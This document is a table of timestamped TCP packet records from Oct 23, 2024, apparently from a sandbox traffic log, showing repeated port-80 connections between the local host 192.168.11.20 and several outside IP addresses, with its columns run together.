                                                                                                                                                                                                                        Oct 23, 2024 18:55:31.718187094 CEST4982380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:31.818036079 CEST80498233.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:32.735620975 CEST4982480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:33.748976946 CEST4982480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:35.764153004 CEST4982480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:39.778891087 CEST4982480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:39.880029917 CEST80498243.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:39.880245924 CEST4982480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:39.885266066 CEST4982480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:39.985752106 CEST80498243.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:39.987567902 CEST80498243.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:39.987607956 CEST80498243.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:39.987988949 CEST4982480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:39.989814043 CEST4982480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:40.090230942 CEST80498243.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.134216070 CEST4982580192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.444775105 CEST804982584.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.444945097 CEST4982580192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.452406883 CEST4982580192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.763029099 CEST804982584.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.763083935 CEST804982584.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:47.982268095 CEST4982680192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:48.292813063 CEST804982684.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:48.293095112 CEST4982680192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:48.301084042 CEST4982680192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:48.611413956 CEST804982684.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:48.620352030 CEST804982684.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:50.825501919 CEST4982780192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.138025999 CEST804982784.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.138247967 CEST4982780192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.146141052 CEST4982780192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.146189928 CEST4982780192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.146236897 CEST4982780192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.476075888 CEST804982784.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.476099968 CEST804982784.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.476113081 CEST804982784.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.476124048 CEST804982784.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.476139069 CEST804982784.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.476151943 CEST804982784.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.476246119 CEST804982784.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.476365089 CEST804982784.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:53.669564009 CEST4982880192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:53.980839968 CEST804982884.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:53.981055021 CEST4982880192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:53.986085892 CEST4982880192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297080040 CEST804982884.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297432899 CEST804982884.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297506094 CEST804982884.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297565937 CEST804982884.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297621965 CEST804982884.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297667027 CEST804982884.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297708988 CEST804982884.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297713995 CEST4982880192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297749996 CEST804982884.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297805071 CEST804982884.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297838926 CEST804982884.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297861099 CEST4982880192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297910929 CEST4982880192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.298175097 CEST4982880192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.299998045 CEST4982880192.168.11.2084.32.84.32
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.611119986 CEST804982884.32.84.32192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.556978941 CEST4982980192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.651818991 CEST804982975.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.652004004 CEST4982980192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.659310102 CEST4982980192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.754168034 CEST804982975.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.813520908 CEST804982975.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.813649893 CEST4982980192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:01.164882898 CEST4982980192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:01.259896040 CEST804982975.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:02.182316065 CEST4983080192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:02.276566982 CEST804983075.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:02.276777029 CEST4983080192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:02.284226894 CEST4983080192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:02.378887892 CEST804983075.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:02.436415911 CEST804983075.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:02.436659098 CEST4983080192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:03.789232016 CEST4983080192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:03.884336948 CEST804983075.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:04.806827068 CEST4983180192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:04.903467894 CEST804983175.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:04.903690100 CEST4983180192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:04.911489964 CEST4983180192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:04.911542892 CEST4983180192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:04.911597013 CEST4983180192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:05.005840063 CEST804983175.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:05.005937099 CEST804983175.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:05.005975962 CEST804983175.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:05.006057024 CEST804983175.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:05.006093025 CEST804983175.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:05.006189108 CEST804983175.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:05.006225109 CEST804983175.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:05.067718983 CEST804983175.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:05.067883015 CEST4983180192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:06.413656950 CEST4983180192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:06.508063078 CEST804983175.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.431128979 CEST4983280192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.525569916 CEST804983275.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.525733948 CEST4983280192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.535723925 CEST4983280192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.631104946 CEST804983275.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.689454079 CEST804983275.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.689517021 CEST804983275.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.689774990 CEST4983280192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.693032980 CEST4983280192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.696495056 CEST804983275.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.696700096 CEST4983280192.168.11.2075.2.19.62
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.787465096 CEST804983275.2.19.62192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:12.804996014 CEST4983380192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:12.899827957 CEST8049833172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:12.899987936 CEST4983380192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:12.907430887 CEST4983380192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.002262115 CEST8049833172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.194932938 CEST8049833172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.194988966 CEST8049833172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195142031 CEST8049833172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195147038 CEST4983380192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195286036 CEST8049833172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195380926 CEST8049833172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195488930 CEST4983380192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195493937 CEST8049833172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195703983 CEST4983380192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.196351051 CEST8049833172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.196525097 CEST4983380192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:14.412009001 CEST4983380192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.429469109 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.524125099 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.524339914 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.531770945 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.626319885 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820482016 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820569992 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820753098 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820760965 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820848942 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820858002 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820916891 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820981026 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.821086884 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.821573019 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.821692944 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:17.036499977 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.053906918 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.148576975 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.148720980 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.156327009 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.156388044 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.250966072 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.251009941 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.251044035 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.251072884 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.251156092 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.251277924 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.251307964 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.429986000 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430042028 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430166006 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430226088 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430263996 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430310965 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430430889 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430444002 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430464029 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430651903 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:19.660912991 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:20.678364038 CEST4983680192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:20.773170948 CEST8049836172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:20.773448944 CEST4983680192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:20.778458118 CEST4983680192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:20.872987986 CEST8049836172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:21.046061993 CEST8049836172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:21.046648026 CEST8049836172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:21.046824932 CEST4983680192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:21.048257113 CEST4983680192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:21.143003941 CEST8049836172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.168715954 CEST4983780192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.263777018 CEST8049837104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.264157057 CEST4983780192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.271603107 CEST4983780192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.366787910 CEST8049837104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.821609020 CEST8049837104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.821675062 CEST8049837104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.821682930 CEST8049837104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.821968079 CEST8049837104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.822030067 CEST4983780192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.822096109 CEST4983780192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:27.784184933 CEST4983780192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:28.801655054 CEST4983880192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:28.896055937 CEST8049838104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:28.896244049 CEST4983880192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:28.903660059 CEST4983880192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:28.997958899 CEST8049838104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477283955 CEST8049838104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477375031 CEST8049838104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477386951 CEST8049838104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477515936 CEST4983880192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477634907 CEST8049838104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477737904 CEST4983880192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:30.408613920 CEST4983880192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.426105976 CEST4983980192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.520256996 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.520425081 CEST4983980192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.527971029 CEST4983980192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.528033018 CEST4983980192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622320890 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622402906 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622533083 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622558117 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622581959 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622664928 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622693062 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102612972 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102679968 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102724075 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102884054 CEST4983980192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102912903 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.103219032 CEST4983980192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:33.033560991 CEST4983980192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.050549030 CEST4984080192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.146179914 CEST8049840104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.146440029 CEST4984080192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.151449919 CEST4984080192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.246233940 CEST8049840104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711076021 CEST8049840104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711146116 CEST8049840104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711201906 CEST8049840104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711244106 CEST8049840104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711277008 CEST8049840104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711307049 CEST8049840104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711325884 CEST4984080192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711539984 CEST4984080192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711539984 CEST4984080192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.714827061 CEST4984080192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.809575081 CEST8049840104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:39.931349993 CEST4984180192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:40.025734901 CEST8049841142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:40.026004076 CEST4984180192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:40.033432961 CEST4984180192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:40.128118038 CEST8049841142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:40.173388958 CEST8049841142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:40.179616928 CEST8049841142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:40.179763079 CEST4984180192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:41.546971083 CEST4984180192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:42.564416885 CEST4984280192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:42.659025908 CEST8049842142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:42.659214020 CEST4984280192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:42.666627884 CEST4984280192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:42.761059999 CEST8049842142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:42.823436022 CEST8049842142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:42.823534966 CEST8049842142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:42.823664904 CEST4984280192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:44.171446085 CEST4984280192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.188853025 CEST4984380192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.283365965 CEST8049843142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.283554077 CEST4984380192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.291646957 CEST4984380192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.291729927 CEST4984380192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.386077881 CEST8049843142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.386183023 CEST8049843142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.386225939 CEST8049843142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.386265039 CEST8049843142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.386300087 CEST8049843142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.386400938 CEST8049843142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.386440039 CEST8049843142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.463459015 CEST8049843142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.463502884 CEST8049843142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.463629007 CEST4984380192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:46.795861959 CEST4984380192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:47.813303947 CEST4984480192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:47.907738924 CEST8049844142.251.40.243192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:47.907952070 CEST4984480192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:47.912940979 CEST4984480192.168.11.20142.251.40.243
                                                                                                                                                                                                                        Oct 23, 2024 18:56:48.007256031 CEST8049844142.251.40.243192.168.11.20
